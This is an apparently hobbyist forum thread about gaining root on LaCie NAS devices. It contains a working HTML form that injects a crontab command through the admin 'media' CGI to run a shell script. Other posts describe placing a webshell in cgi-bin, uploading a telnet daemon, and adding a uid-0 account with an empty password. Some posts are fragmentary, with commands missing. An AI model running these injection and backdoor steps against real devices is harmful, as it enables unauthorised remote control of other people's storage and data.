General NAS-Central Forums

otherwhise,
you can try to put in the destination folder :

/www/cgi-bin/admin/home

and access webshell via : ...admin/home/'your dir'/webshell.

i don't try it, but maybe it's a solution (depend if it create dir or not).

belese

Hello,

It is possible with latest firmware to install webshell, or run directly telnet, using crontab. To do that you have only to save this html and enter the command you want to run:

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
<title>Hack NAS</title>
<link rel='stylesheet' href='/css/lacie.css' type='text/css' />
</head>
<body>
<form name='edit_form' method='post' action='http://192.168.1.66/cgi-bin/admin/media'>
<input type='hidden' id='autoscn' name='autoscn' value=true>
<input type='hidden' id='modified' name='modified' value='true'>
<input name='hour' value='2>'><input name='minute' value='16 15 * * * sh /home/openshare/hack.sh > /home/openshare/scriptrunok '>

<input type=submit value='SET CRONTAB'>
</body>
</html>

Change 192.168.1.66 with the ip of your LACIE NAS, and 16 15 with the minutes/hours you want to execute the script.
Here it was 15:16. (but if you're not a newbie in Linux as I am it will be clear for you).

I compiled lots of tutorials to install ssh: here is the result: it works !!

Connect via telnet and install ipkg:
wget http://ipkg.nslu2-linux.org/feeds/optwa ... 10_arm.ipk
tar -xOvzf ipkg-opt_*_arm.ipk ./data.tar.gz | tar -C / -xzvf -
mkdir -p /opt/etc/ipkg
echo "src armel http://ipkg.nslu2-linux.org/feeds/optwa ... oss/stable" > /opt/etc/ipkg/armel-feed.conf
/opt/bin/ipkg update

Install openssh via ipkg:
/opt/bin/ipkg install openssh

Create a new user, here new_root into /etc/passwd i add:
new_root:x:0:0:Linux User,,,:/home:/bin/sh

put an empty password for new_root into /etc/shadow i add:
new_root::12488:0:99999:7:::

Create a password for new_root: passwd new_root

Install ssh to run on each startup:
ln -s /opt/etc/init.d/S40sshd /etc/rc.d/rc3.d/

Thats all.

Hi Mate,

Thanks a lot for your work.

This link http://jebimony.com/blog/content/add-ssh-lacie-edmini-v2 is very hard to complete

So I hack mine like this:

Copy "utelnetd" to /www/cgi-bin/admin/my_time_dir or to /home/openshare/utelnetd by network /openshare/utelnetd

Then activate telnet, with:


Browser post this:


Then with putty i telnet lacie, but i have no root passwd!!!

So the easy way i found:


Browser post this:

Next telnet with putty, and it's done:


Linux:


Partitions:


Tanks in advance for your work!!!

Dekonass

Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.

_________________
Web: cognitivecombine.com - OS's: Ubuntu 9.04 & Mac OSX 10.5

Copy on only this:


But, make this file in linux, or using notepad++ in windows, then copy to usb, or to lacie openshare using path /home/openshare is the same ...

See you,

Thanks very much for your response.

And what do I do with the html file, from where do I launch it?

_________________
Web: cognitivecombine.com - OS's: Ubuntu 9.04 & Mac OSX 10.5

Open the html file in a browser on your desktop.

Hi,

I haven't been able to execute the script in the Network Space.

I'll explain what I've done because maybe someone has a hint on how to continue.

The software version in my lacie is 1.1.6

The steps I followed are:

1. create a folder named "hack" openshare.
2. create a file named backdoor in openshare\hack\ with the sh file above in that thread (#!/bin/sh ...)
3. create a file named "index.html" in openshare with the html above in that thread (<html><head><title>Backup</title>...)
4. open the file index.html with a browser in your computer
5. changed the first input in that webpage to my network space ip
6. changed the second input in that webpage to /home/openshare/hack
7. left the last input in that webpage as it is /www/cgi-bin/admin
8. clicked copy

At this point i got the same error as described by Ferretz


I continued anyway.

9.get access to the twonkyvision administration as indicated here:


10 access to twonkyvision configuration and go to basic setup > sharing in the left side menu
11 click on "browse" button in any of the Content Locations: inputs.
12 a onscreen pop up with the folder strcture should appear
13 browse to www > cgi-bin > admin
14 there should be a folder named hack-200003310303954473206 with the numbers representing your actual timestamp.
15 copy the name
16 go to

it should say root.

My backdoor file did not get copied.

I tried a thousand combinations like coping files to
/www/cgi/bin/home
with no luck.

If i do the backup with some media files inside the folder hack the do get copied.
I successfully copied mp3, images and folders with this method but any strange file like .sh or text files does not get copied.
Also the mp3 files copied disapeared from the hacked folder or at lest did not get accessible via web.
I have been able to play mp3 uploaded that way with an url like that:

but not with that:

Wich is the adress where I uploaded the mp3 in the first place.
Maybe the file did get moved or just made unacessible from web.

Of course i tried to upload a sh file with the name backdoor.mp3 with no luck.

In the other hand I've also tried the crontab methdo but I had no luck with that also.

I created the html file, set the ip to my ip and the origin file to my file executed it and set the minutes and seconds to a future time but i got a not found in


I've checked with tomkyvision and I do not have the folder media.
Of course maybe I don't have the last version of the software.

Sorry for the redundancy, I had a little trouble getting all together the first time and, even if it did not work, I think it could be useful to someone.

Hanoc,

you were able to find the find the folder using twonky I see, but what does it display if you go to http://networkspace/cgi-bin/admin/...
if you get a http 404 not found error, you probably have the wrong character encoding.
are you on a windows pc?

grtz

I also have version 1.1.8. The file did get uploaded to the correct dir at my system (you can check that by having the system copied *to* openshare).

If I would upload a file called "webshell", "hack", "imharmless" or whatever, it wouldn't be executed. For some reason, the file "config2" is executed, so I now got my own little webshell

I'm not sure why this is so, maybe more on that some other time. Can others confirm this is working for 1.1.8 as well?

Good luck anyway... And thanks for all the tips!

P.S. You could also upload files through the twonkywonky, just set the upload dir appropriately. I think it will only upload actual media files (judging by the extensions)

Can I ask if this will in any way upset the way it is currently running?

I dont want to lose my data.

_________________
Dumb Windows user & 500gb Network Store owner.
I'm not compatible with Linux

If I go to:

http://MYIP/www/cgi-bin/admin

It couldn't be find?
Could you help me?

There are several more polished guides to hacking the NetworkSpace:

http://beinfamous.blogspot.com/2009/08/ ... art-i.html
http://doyouhateme.bizarro.org.uk/2009/ ... thout.html
http://blog.hendricksen.eu/2009/07/29/g ... he-device/

Try one of these, they are based on belese's hack but probably easier to follow.

Maybe it's time to make a thread with one working sollution for version 1.18 (networkspace 1) and make that thread a sticky in this subforum?

It's getting confusing...

I agree

The only approach i have managed to get working is the crontab method, i.e.

http://blog.hendricksen.eu/2009/07/29/get-a-root-shell-on-lacie-network-space-device-without-physically-opening-the-device/

The information on that page was clear and worked first time, so it gets my vote

Ackk Ooop.